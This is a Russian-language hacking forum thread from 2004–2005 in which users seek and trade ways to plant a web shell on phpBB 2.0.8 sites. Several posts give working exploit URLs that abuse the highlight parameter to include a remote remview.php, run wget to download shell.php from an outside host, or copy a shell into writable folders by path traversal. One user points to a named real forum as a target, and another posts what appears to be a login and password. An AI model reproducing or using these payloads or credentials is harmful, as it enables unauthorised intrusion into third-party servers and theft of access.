Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group

Discussion in 'Песочница' started by onyx3, 21 Dec 2004.

  1. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Люди, подскажите плизз.... буду очень признателен:

    вот когда я хочу скатать шелл на сервер, используя:


    http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527


    мне в ответ пишет:

    he html tags you attempted to use are not allowed

    [ Go Back ]

    Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group
     
  2. TaskFall

    TaskFall New Member

    Joined:
    24 Dec 2004
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    можно закачать shell этой командой:
    viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%60.%2527&ls=wget%20http://badsite/shell.php

    или:
    viewtopic.php?p=3906&highlight=%2527.$poster=`wget%09http://badsite/shell.php`.%2527

    может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)
     
  3. illusion

    illusion Banned

    Joined:
    7 Dec 2004
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Onyx3, а почему ...t=44=... это бред! в твоём случае надо писать без t= !
     
  4. DarkDante

    DarkDante Banned

    Joined:
    24 Dec 2004
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    а у меня вообще пишет что такой темы нет :confused:
     
    1 person likes this.
  5. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Люди, ведь форум находится в : http://имяхоста/modules.php?name=Forums

    И не одна из этих комманд чтобы залить шелл не действует!!!
    Пишет либо - модуль не активен, либо ошибку Денвера!!!


    Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group
     
  6. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    поробуй выполнить команды так:
     
  7. vega2k

    vega2k New Member

    Joined:
    26 Dec 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    а возможно ли записать открытую на запись, которая находиться на сервере не в папке "форум"

    и еще,
    ну узнал, я какая папка доступна на запись (даже в папке форум), что в запрос надо написать ?

    viewtopic.php?a=http://123.123.123.123/remview.php&b=../../db/rem.php&t=4&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527 ???????

    типо этого? b=../../db/
    а что вместо точек писать? полный путь? где находиться папка?
    в таком случае как именно?
    что брать за корневой католог?
    forum/db/
    или полный путь
    /usr/home/public_html/forum


    не понятно всё это...

    P.S.
    ведь drwxrwxrwx - это открытая папка на запись.
     
    #7 vega2k, 26 Dec 2004
    Last edited: 26 Dec 2004
  8. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    да не геморься ты, лучше залей обычным wget'ом и потом скопируй...
     
  9. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    мне в ответ пишет:

    The html tags you attempted to use are not allowed

    [ Go Back ]

    Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group
     
  10. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Эй ну что кто нибудь встречал такую проблему??
     
  11. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Эй народ по активнее, по активне
     
  12. ringer

    ringer New Member

    Joined:
    11 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    вот форум версии 2.0.8
    http://lipetsk.ru/town/forum2/
    сам я профан во всем этом
    но был рад если его ломанули
     
  13. frisco_virus

    frisco_virus New Member

    Joined:
    6 Jan 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    pass: pinochet
    user: www2
     
  14. ringer

    ringer New Member

    Joined:
    11 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    ответ на мой пост?
     
  15. ringer

    ringer New Member

    Joined:
    11 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  16. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Какие вы можете предложить варианты взлома форму 2.08 , Union не проходит, может ещё какие нибудь есть??? И ещё как можно посматреть папки которые открыты для записи???(прошу написать комманду)
     
  17. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Народ киньте ссылку где можно скачать remview.php
     
  18. ringer

    ringer New Member

    Joined:
    11 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  19. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Плиззз... напишите какими прогами можно подменять Cookie??? если не сложно то напишите ссылочку...
     
  20. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    CookieEditor
    http://antichat.ru/txt/old/progs.shtml
     
Loading...